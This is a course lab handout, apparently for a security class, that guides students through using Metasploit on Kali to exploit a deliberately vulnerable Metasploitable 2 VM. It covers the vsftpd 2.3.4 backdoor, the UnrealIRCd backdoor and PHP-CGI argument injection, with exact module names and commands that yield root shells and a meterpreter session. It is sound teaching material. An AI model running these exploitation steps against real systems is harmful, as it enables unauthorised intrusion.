Project 6: Metasploit v. Linux (15 points)

What You Need

  1. A Kali Linux machine, real or virtual
  2. The "Metasploitable 2" vulnerable Linux Server you prepared in a previous project

Setup

Start your Kali VM and log in as root with the password toor

Start your Metasploitable 2 VM and log in as msfadmin with the password msfadmin

Execute the ifconfig command on both machines and ping from one to the other. Make sure you get replies, as shown below.

Task 1: Exploiting vsftpd

In the previous project, Nmap found the FTP server "vsftpd 2.3.4" running on the Metasploitable 2 target.

In Kali, execute this command to open Metasploit. 

msfconsole
At the "msf>" prompt, execute this command. 
search vsftpd
As shown below, one exploit is found.

Execute these commands: 

use exploit/unix/ftp/vsftpd_234_backdoor
show options
As shown below, the only required parameter is RHOST, the IP address of the target system.

Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM. 

set RHOST 172.16.1.190
exploit
As shown below, a command shell session opens. Execute the whoami command to see the reply root.

Capturing a Screen Image

Make sure the "Command shell session opened" message is visible, as shown above.

Capture a whole-desktop image and save it as "Proj 6a".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT In Kali, execute these commands to exit the shell and Metasploit. 

exit
exit

Task 2: Exploiting Unreal IRCd

In the previous project, Nmap found the UnrealIRCd server listening on port 6667 on the Metasploitable 2 target.

In Kali, execute this command to open Metasploit. 

msfconsole
At the "msf>" prompt, execute this command. 
search unreal
As shown below, one exploit is found.

Execute these commands: 

use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
As shown below, the only required parameter is RHOST, the IP address of the target system.

Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM. 

set RHOST 172.16.1.190
exploit
As shown below, a command shell session opens. Execute the whoami command to see the reply root.

Capturing a Screen Image

Make sure the "Command shell session opened" message is visible, as shown above.

Capture a whole-desktop image and save it as "Proj 6b".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT Press Ctrl+C to cancel the session.

In Kali, execute these commands to exit the shell and Metasploit. 

y
exit

Task 3: Exploiting PHP CGI Argument Injection

On your Kali VM, open Firefox and go to the IP address of your Metasploitable 2 VM.

A Web page opens, as shown below.

Click the phpMyAdmin link.

Append this to the end of the URL, and press Enter. 

?-s
The source code of the Web page appears, as shown below.

This is a known bug in PHP-CGI, and it allows us to get remote code execution with Metasploit.

In Kali, execute this command to open Metasploit. 

msfconsole
At the "msf>" prompt, execute this command. 
search php_cgi
As shown below, one exploit is found.

Execute these commands: 

use exploit/multi/http/php_cgi_arg_injection
show options
As shown below, the only required parameter is RHOST, the IP address of the target system.

Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM. 

set RHOST 172.16.1.190
exploit
As shown below, a meterpreter session opens.

Troubleshooting

If you are using Kali 2017.2, this exploit fails, and you get the message "Meterpreter session closed ... reason: died" message, as shown below. This seems to be a bug in Kali. Just turn in that image and I'll accept it.

Execute these commands to see system information and your user ID. You are "www-data", which is a low-privilege account. To get root access, you need another exploit, as discussed here. 

sysinfo
getuid

Capturing a Screen Image

Make sure the "Meterpreter session opened" message is visible, as shown above.

Capture a whole-desktop image and save it as "Proj 6c".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Turning in Your Project

Email the images to cnit.124@gmail.com with a subject line of "Proj 6 From YOUR NAME", replacing "YOUR NAME" with your real name.

Send a Cc to yourself.

Credits

Exploiting VSFTPD v2.3.4 on Metasploitable 2

Hacking Unreal IRCd 3.2.8.1 on Metasploitable 2

CVE-2012-1823: PHP CGI

https://community.rapid7.com/docs/DOC-1875

Last Modified: 10-12-17 9 pm